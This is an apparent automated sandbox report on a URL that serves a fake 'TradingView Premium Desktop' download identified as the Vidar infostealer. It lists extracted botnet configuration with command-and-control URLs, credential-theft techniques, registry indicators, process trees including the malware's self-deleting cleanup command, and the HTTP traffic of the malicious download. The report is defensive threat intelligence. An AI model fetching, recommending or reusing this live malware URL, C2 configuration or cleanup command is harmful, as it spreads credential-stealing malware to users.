vidar | hxxps://rnwinternational[.]com/get/

Analysis

max time kernel
281s
max time network
274s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02/10/2024, 17:29 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://rnwinternational.com/get/

Score

10^/10

vidar 375b94c37c085fa071ae0bb3b36a96d3 credential_access discovery spyware stealer

Malware Config

Extracted

Family

vidar

Version

Botnet

375b94c37c085fa071ae0bb3b36a96d3

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Signatures

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/544-467-0x0000000000BD0000-0x000000000171D000-memory.dmp	family_vidar_v7
behavioral1/memory/544-559-0x0000000000BD0000-0x000000000171D000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	TradingView Premium Desktop.exe

Executes dropped EXE 1 IoCs

pid	Process
544	TradingView Premium Desktop.exe

Loads dropped DLL 2 IoCs

pid	Process
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TradingView Premium Desktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TradingView Premium Desktop.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TradingView Premium Desktop.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
848	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133723637871216774"	chrome.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3316	chrome.exe
3316	chrome.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
544	TradingView Premium Desktop.exe
2120	chrome.exe
2120	chrome.exe
2120	chrome.exe
2120	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3316	chrome.exe
3316	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeRestorePrivilege	1148	7zG.exe
Token: 35	1148	7zG.exe
Token: SeSecurityPrivilege	1148	7zG.exe
Token: SeSecurityPrivilege	1148	7zG.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe
Token: SeRestorePrivilege	64	7zG.exe
Token: 35	64	7zG.exe
Token: SeSecurityPrivilege	64	7zG.exe
Token: SeSecurityPrivilege	64	7zG.exe
Token: SeShutdownPrivilege	3316	chrome.exe
Token: SeCreatePagefilePrivilege	3316	chrome.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
1148	7zG.exe
64	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe
3316	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3316 wrote to memory of 4084	3316	chrome.exe	89
PID 3316 wrote to memory of 4084	3316	chrome.exe	89
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 2852	3316	chrome.exe	90
PID 3316 wrote to memory of 848	3316	chrome.exe	91
PID 3316 wrote to memory of 848	3316	chrome.exe	91
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92
PID 3316 wrote to memory of 780	3316	chrome.exe	92

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://rnwinternational.com/get/
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc840ccc40,0x7ffc840ccc4c,0x7ffc840ccc58
  2⤵
  PID:4084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:2852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2440 /prefetch:8
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4620,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4632 /prefetch:8
  2⤵
  PID:2252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4408 /prefetch:8
  2⤵
  PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3748,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3768 /prefetch:3
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5008,i,15444549333818326805,18371002394288615205,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4640 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2120

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1996,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8
1⤵
PID:540

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:388

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap586:116:7zEvent2996
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1148

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap22628:152:7zEvent6387
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:64

C:\Users\Admin\Downloads\TradingView Premium Desktop.exe
"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:544
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKKEBGCGHIDH" & exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1412
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 10
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2784,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=2300 /prefetch:3
1⤵
PID:2392

Network

DNS

rnwinternational.com

chrome.exe

Remote address:

8.8.8.8:53

Request

rnwinternational.com

IN A

Response

rnwinternational.com

IN A

172.67.159.20

rnwinternational.com

IN A

104.21.42.74
GET

https://rnwinternational.com/get/

chrome.exe

Remote address:

172.67.159.20:443

Request

GET /get/ HTTP/2.0
host: rnwinternational.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 02 Oct 2024 17:29:47 GMT
content-type: text/html
last-modified: Tue, 24 Sep 2024 08:31:49 GMT
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHy5oSZ8WTLyXPKOabUcJIGO2cC2kI%2FSI3ukqTRaNOMj%2Fl2DxfjOFitAzc8aIF3j3gtCOuZPurwr2w7uxajPHqPHiSRN9P2bapyMXL5putRNdQu%2Bs1eTCSBNXUcPItlKikKmboqB8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
speculation-rules: "/cdn-cgi/speculation"
server: cloudflare
cf-ray: 8cc66aa76810773e-LHR
content-encoding: br
GET

https://rnwinternational.com/cdn-cgi/speculation

chrome.exe

Remote address:

172.67.159.20:443

Request

GET /cdn-cgi/speculation HTTP/2.0
host: rnwinternational.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://rnwinternational.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: speculationrules
referer: https://rnwinternational.com/get/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 02 Oct 2024 17:29:48 GMT
content-type: application/speculationrules+json
content-length: 128
access-control-allow-origin: https://rnwinternational.com
vary: Origin, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5ln7u56NhLUUagkrd5rjDFH%2BAq8aqdShdMV39NR345OP%2BqBpP4bYWmhT4XoeEO2Nu0O78%2Fmqg%2BFzxqExqEwhLiApeNsBMtQYPkxNB4za%2FI8qNNSo5g0rz%2BZ6NOV80LJcbEz4ozj1A%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8cc66aab0c95773e-LHR
GET

https://rnwinternational.com/tradingview_premium/TradingView_Premium_Desktop.zip

chrome.exe

Remote address:

172.67.159.20:443

Request

GET /tradingview_premium/TradingView_Premium_Desktop.zip HTTP/2.0
host: rnwinternational.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://rnwinternational.com/get/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Wed, 02 Oct 2024 17:29:48 GMT
content-type: application/zip
content-length: 139154773
last-modified: Tue, 24 Sep 2024 08:29:55 GMT
x-turbo-charged-by: LiteSpeed
cache-control: max-age=14400
cf-cache-status: HIT
age: 3852
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xe7ftUXwernuDoMR%2FFTiWZIoN%2FBTMO9Dk5DRMggxA0%2B91DtXHNETRNvq1HJNeUOW24sIlX7URXBjs4SVm89%2BdkttblrqVVAhPw6is0wJ%2ByhdeeJUjleUwF%2Br87c4XipXoiJ876XAuA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cc66aab3cdf773e-LHR
GET

https://rnwinternational.com/favicon.ico

chrome.exe

Remote address:

172.67.159.20:443

Request

GET /favicon.ico HTTP/2.0
host: rnwinternational.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://rnwinternational.com/get/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 404

date: Wed, 02 Oct 2024 17:29:48 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/8.0.30
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
cache-control: max-age=14400
cf-cache-status: HIT
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
speculation-rules: "/cdn-cgi/speculation"
server: cloudflare
cf-ray: 8cc66aab3ce3773e-LHR
content-encoding: br
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

101.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.209.201.84.in-addr.arpa

IN PTR

Response
DNS

20.159.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.159.67.172.in-addr.arpa

